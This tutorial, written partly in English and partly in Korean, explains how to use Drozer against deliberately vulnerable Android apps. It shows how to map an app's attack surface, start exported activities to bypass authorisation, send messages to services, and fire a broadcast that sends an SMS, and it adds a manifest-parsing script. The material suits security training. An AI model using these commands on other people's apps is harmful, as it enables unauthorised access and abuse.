Drozer Tutorial


APKs to test

  • Sieve (from mrwlabs)
  • DIVA

Parts of this tutorial were extracted from the Drozer documentation pdf.

Installation

Install the Drozer client on your host. Download it from the latest releases.

pip install drozer-2.4.4-py2-none-any.whl
pip install twisted
pip install service_identity

Download and install the drozer APK from the latest releases. At this moment it is this one.

adb install drozer.apk

Starting the server

The Agent listens on port 31415, so we need to forward that port to establish the communication between the Drozer client and the Agent. This is the command to do so:

adb forward tcp:31415 tcp:31415

Finally, launch the application and press the "ON" button at the bottom.

Then connect to it:

drozer console connect

Interesting Commands

Command        Description
help MODULE    Show the help of the selected module.
list           Show a list of all drozer modules that can be executed in the current session. Modules you do not have the right permissions to run are hidden.
shell          Start an interactive Linux shell on the device, in the context of the Agent.
clean          Remove temporary files stored by drozer on the Android device.
load           Load a file containing drozer commands and execute them in sequence.
module         Find and install additional drozer modules from the Internet.
unset          Remove a named variable that drozer passes to any Linux shell it spawns.
set            Store a value in a variable that is passed as an environment variable to any Linux shell drozer spawns.
run MODULE     Execute a drozer module.
exploit        Drozer can create exploits to execute on the device: drozer exploit list
payload        The exploits need a payload: drozer payload list

Package

μ΄λ¦„μ˜ μΌλΆ€λ‘œ ν•„ν„°λ§ν•˜μ—¬ νŒ¨ν‚€μ§€μ˜ 이름을 μ°ΎμŠ΅λ‹ˆλ‹€:

dz> run app.package.list -f sieve
com.mwr.example.sieve

νŒ¨ν‚€μ§€μ˜ κΈ°λ³Έ 정보:

dz> run app.package.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Process Name: com.mwr.example.sieve
Version: 1.0
Data Directory: /data/data/com.mwr.example.sieve
APK Path: /data/app/com.mwr.example.sieve-2.apk
UID: 10056
GID: [1028, 1015, 3003]
Shared Libraries: null
Shared User ID: null
Uses Permissions:
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.WRITE_EXTERNAL_STORAGE
- android.permission.INTERNET
Defines Permissions:
- com.mwr.example.sieve.READ_KEYS
- com.mwr.example.sieve.WRITE_KEYS

Read the Manifest:

run app.package.manifest jakhar.aseem.diva

νŒ¨ν‚€μ§€μ˜ 곡격 ν‘œλ©΄:

dz> run app.package.attacksurface com.mwr.example.sieve
Attack Surface:
3 activities exported
0 broadcast receivers exported
2 content providers exported
2 services exported
is debuggable
  • ν™œλ™: μ•„λ§ˆλ„ ν™œλ™μ„ μ‹œμž‘ν•˜κ³  이λ₯Ό μ‹€ν–‰ν•˜λŠ” 것을 λ°©μ§€ν•΄μ•Ό ν•˜λŠ” μ–΄λ–€ μ’…λ₯˜μ˜ κΆŒν•œμ„ μš°νšŒν•  수 μžˆμ„ κ²ƒμž…λ‹ˆλ‹€.
  • μ½˜ν…μΈ  제곡자: μ•„λ§ˆλ„ 개인 데이터에 μ ‘κ·Όν•˜κ±°λ‚˜ 일뢀 취약점(SQL Injection λ˜λŠ” Path Traversal)을 μ•…μš©ν•  수 μžˆμ„ κ²ƒμž…λ‹ˆλ‹€.
  • μ„œλΉ„μŠ€:
  • 디버깅 κ°€λŠ₯: μžμ„Ένžˆ μ•Œμ•„λ³΄κΈ°
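As an added, defender-side check (not part of the original page or of Drozer itself), the following Python script parses an AndroidManifest.xml and reports the same attack surface that app.package.attacksurface summarizes: exported activities, services, receivers and providers, which of them lack an android:permission, and whether the app is debuggable. The manifest is a constructed sample and the package and component names in it are assumptions.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")

# Constructed sample manifest (not Sieve's or DIVA's), mirroring the snippets on this page.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.demo">
  <application android:debuggable="true">
    <activity android:name="com.example.test.MainActivity" android:exported="true"/>
    <activity android:name=".SettingsActivity" android:exported="false"/>
    <service android:name=".AuthService" android:exported="true" android:process=":remote"/>
    <receiver android:name=".SendSMSNowReceiver">
      <intent-filter><action android:name="org.example.SOCIAL_SMS"/></intent-filter>
    </receiver>
    <provider android:name=".DBProvider" android:authorities="com.example.demo.db"
              android:exported="true" android:permission="com.example.demo.READ_DB"/>
  </application>
</manifest>"""


def _attr(elem, name):
    # Read an android:-namespaced attribute, or None if it is absent.
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def attack_surface(manifest_xml):
    """Return exported components per type, the debuggable flag, and the
    exported components that declare no android:permission.
    A component counts as exported when android:exported="true", or when it
    omits android:exported but has an <intent-filter> (pre-Android-12 rule)."""
    root = ET.fromstring(manifest_xml)
    pkg = root.get("package", "")
    app = root.find("application")
    result = {
        "debuggable": _attr(app, "debuggable") == "true",
        "exported": {tag: [] for tag in COMPONENT_TAGS},
        "unprotected": [],
    }
    for tag in COMPONENT_TAGS:
        for comp in app.iter(tag):
            exported = _attr(comp, "exported")
            has_filter = comp.find("intent-filter") is not None
            if exported == "true" or (exported is None and has_filter):
                name = _attr(comp, "name")
                if name.startswith("."):  # expand a relative class name
                    name = pkg + name
                result["exported"][tag].append(name)
                if _attr(comp, "permission") is None:
                    result["unprotected"].append(name)
    return result
```

Run it against a manifest decoded from the APK (for example with apktool) to cross-check what Drozer reports before you start poking at individual components.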

ν™œλ™

λ‚΄λ³΄λ‚΄κΈ°λœ ν™œλ™ ꡬ성 μš”μ†Œμ˜ β€œandroid:exported” 값은 AndroidManifest.xml νŒŒμΌμ—μ„œ **β€œtrue”**둜 μ„€μ •λ©λ‹ˆλ‹€:

<activity android:name="com.my.app.Initial" android:exported="true">
</activity>

List the exported activities:

dz> run app.activity.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
com.mwr.example.sieve.FileSelectActivity
com.mwr.example.sieve.MainLoginActivity
com.mwr.example.sieve.PWList

Start an activity:

Maybe you can start an activity and bypass some kind of authorization that should be preventing you from launching it.

dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList

You can also start an exported activity from adb:

  • The PackageName is com.example.demo
  • The exported ActivityName is com.example.test.MainActivity
adb shell am start -n com.example.demo/com.example.test.MainActivity

Content Providers

This post was too big to fit here, so you can access it in its own page here.

Services

An exported service is declared inside the Manifest.xml:

<service android:name=".AuthService" android:exported="true" android:process=":remote"/>

Inside the code, check the handleMessage function, which is the one that receives the message:

List service

dz> run app.service.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
com.mwr.example.sieve.AuthService
Permission: null
com.mwr.example.sieve.CryptoService
Permission: null

Interact with a service

app.service.send            Send a Message to a service, and display the reply
app.service.start           Start Service
app.service.stop            Stop Service

Example

Take a look at the drozer help for app.service.send:

Note that you will be sending first the data inside "msg.what", then "msg.arg1" and "msg.arg2"; you should check inside the code which information is being used and where.
Using the --extra option you can send something that will be interpreted by "msg.replyTo", and using --bundle-as-obj you create an object with the provided details.

λ‹€μŒ μ˜ˆμ œμ—μ„œ:

  • what == 2354
  • arg1 == 9234
  • arg2 == 1
  • replyTo == object(string com.mwr.example.sieve.PIN 1337)
run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 2354 9234 1 --extra string com.mwr.example.sieve.PIN 1337 --bundle-as-obj

Broadcast Receivers

In the Android basic information section you can see what a Broadcast Receiver is.

After discovering these Broadcast Receivers you should check their code. Pay special attention to the onReceive function, as it is the one that handles the received messages.

Detect all broadcast receivers

run app.broadcast.info #Detects all

μ•±μ˜ λΈŒλ‘œλ“œμΊμŠ€νŠΈ μˆ˜μ‹ κΈ° 확인

#Check one negative
run app.broadcast.info -a jakhar.aseem.diva
Package: jakhar.aseem.diva
No matching receivers.

# Check one positive
run app.broadcast.info -a com.google.android.youtube
Package: com.google.android.youtube
com.google.android.libraries.youtube.player.PlayerUiModule$LegacyMediaButtonIntentReceiver
Permission: null
com.google.android.apps.youtube.app.common.notification.GcmBroadcastReceiver
Permission: com.google.android.c2dm.permission.SEND
com.google.android.apps.youtube.app.PackageReplacedReceiver
Permission: null
com.google.android.libraries.youtube.account.AccountsChangedReceiver
Permission: null
com.google.android.apps.youtube.app.application.system.LocaleUpdatedReceiver
Permission: null

Broadcast interactions

app.broadcast.info          Get information about broadcast receivers
app.broadcast.send          Send broadcast using an intent
app.broadcast.sniff         Register a broadcast receiver that can sniff particular intents

Send a message

In this example, abusing the FourGoats apk Content Provider, you can send an arbitrary SMS to a non-premium destination without asking the user for permission.

If you read the code, the "phoneNumber" and "message" parameters must be sent to the Content Provider.

run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats.broadcastreceivers SendSMSNowReceiver --extra string phoneNumber 123456789 --extra string message "Hello mate!"

Is debuggable

A production APK should never be debuggable.
This means that you can attach a Java debugger to the running application, inspect it at runtime, set breakpoints, go step by step, gather variable values and even change them. InfoSec Institute has an excellent article on digging deeper when your application is debuggable and injecting runtime code.

When an application is debuggable, it appears in the Manifest:

<application theme="@2131296387" debuggable="true"

You can find all the debuggable applications with Drozer:

run app.package.debuggable
